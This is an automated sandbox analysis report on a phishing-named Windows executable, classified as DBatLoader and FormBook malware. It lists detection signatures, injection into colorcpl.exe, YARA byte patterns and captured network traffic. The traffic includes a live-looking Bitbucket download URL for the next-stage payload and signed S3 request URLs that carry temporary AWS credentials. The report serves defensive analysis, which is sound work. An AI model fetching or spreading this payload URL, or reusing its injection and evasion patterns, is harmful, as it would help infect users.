Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Swift payment confirmation.exe

Overview

General Information

Sample name:Swift payment confirmation.exe
Analysis ID:1545881
MD5:92fdcc36be7b26d49f67f2f02fefbf07
SHA1:f84b37ff359f55cdfc1c60a640cc7081b523e5ce
SHA256:61cf08eac40229e089f7630d5412aa0a8282c01d6348763d92d68e2fcb92e24e
Tags:exeuser-threatcat_ch
Infos:

Detection

DBatLoader, FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected DBatLoader
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates a thread in another existing process (thread injection)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Swift payment confirmation.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\Swift payment confirmation.exe" MD5: 92FDCC36BE7B26D49F67F2F02FEFBF07)
    • colorcpl.exe (PID: 4508 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c150:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1423f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2f0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x171c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.colorcpl.exe.6440000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        2.2.colorcpl.exe.6440000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x2e2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x163c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        2.2.colorcpl.exe.6440000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.colorcpl.exe.6440000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2f0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x171c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          0.2.Swift payment confirmation.exe.32b0000.0.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: Swift payment confirmation.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh"]}
            Multi AV Scanner detection for submitted file
            Source: Swift payment confirmation.exeReversingLabs: Detection: 65%
            Source: Swift payment confirmation.exeVirustotal: Detection: 61%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.colorcpl.exe.6440000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2292243782.0000000004D40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2292379544.0000000006440000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Swift payment confirmation.exeJoe Sandbox ML: detected
            Source: Swift payment confirmation.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.217.102.228:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 52.217.102.228:443 -> 192.168.2.5:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.5:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 3.5.29.82:443 -> 192.168.2.5:49712 version: TLS 1.2
            Source: Binary string: easinvoker.pdb source: Swift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003211000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5908

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CE4B8 InternetCheckConnectionA,0_2_032CE4B8
            Source: Joe Sandbox ViewIP Address: 185.166.143.50 185.166.143.50
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficHTTP traffic detected: GET /akeem4u/canter/downloads/233_Hherfkswbzh HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
            Source: global trafficHTTP traffic detected: GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-40d2-8c89-83ab9690304a/233_Hherfkswbzh?response-content-disposition=attachment%3B%20filename%3D%22233_Hherfkswbzh%22&AWSAccessKeyId=ASIA6KOSE3BNHI54BTHA&Signature=tZ%2FwwJ1FN%2B1%2B9of%2FJeE%2Bo3BV4Ls%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBEaCXVzLWVhc3QtMSJHMEUCIFSQnqGQH2JEqKJhomymNnCA4lYnl%2BQwEzXvtXq0kv5eAiEAzwxPi7%2FqtIduS1Y4GA0jCPQlS4JfP3JMCl51SCYtQhwqsAIIif%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDNPNgKLBoJg8jVpiLCqEAi5vjLhoUXqOlKLnUE4wl75aM276pOHwyiPYxUuzjzqQA1B6E34B6OOSvX9lsRbi3LuXjpVmDTGcat73%2FcWzvA614Ma6TUDMKcSsazo27JULJRZ60HAvQ7Yunt8LD%2FQJa6KQ7ZNxzvc6Im2AB2zO8JFpXZv88sFixKhA48r6SwpoIz88YU5Xnr7RRc%2FcGRXaCf0kE5TOvVuhRKQjrWpgV5%2B3XwWgYItfw7g%2Fg07uObWaxd%2FrUrcnphxewukr1BGhYJb0b7RPPNZECMwI%2B6Rpgub3znYbt8xERbbjY20apm6JRP0ianWEOKjL4kwde4Jr5x2%2F02F%2BJ8VoBjfD%2FdKx4k1jafP8MJ31jLkGOp0BsobkkeqEKCksULQQEEm05vOtphj3NQN6JxFL1ca%2BqDpxc4FYHr%2FFeBn%2BuqLl2quhEkiq46Ben1DguLLCVBSRqgtlRbI5gEDRpi7ahaj02LzU0cUHpJaeveVZ5yc%2FzTJewE1gFKXv%2FHKIzbpWr%2Fy5ZmwOAXHetHAHouttNwAFZiO7EtSoxBRf85SWxv1o5A46RpmdrJqzzK2dRgwplQ%3D%3D&Expires=1730363813 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bbuseruploads.s3.amazonaws.com
            Source: global trafficDNS traffic detected: DNS query: bitbucket.org
            Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
            Source: Swift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003239000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000003003000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FBDF000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2217929734.000000007FE2F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pmail.com
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.0000000000892000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2090782300.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2127766348.00000000008ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-51bf-
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/2
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/I
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/c
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com:443/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/fd5ef9c0-5
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.0000000000863000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/A
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/H
            Source: Swift payment confirmation.exe, 00000000.00000002.2192573378.0000000021088000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2136347138.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzh
            Source: Swift payment confirmation.exe, 00000000.00000003.2091804394.0000000000894000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_HherfkswbzhHG
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000081E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/akeem4u/canter/downloads/233_Hherfkswbzhps.DLL
            Source: Swift payment confirmation.exe, 00000000.00000003.2136347138.00000000008EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/akeem4u/canter/downloads/233_Hherfkswbzh
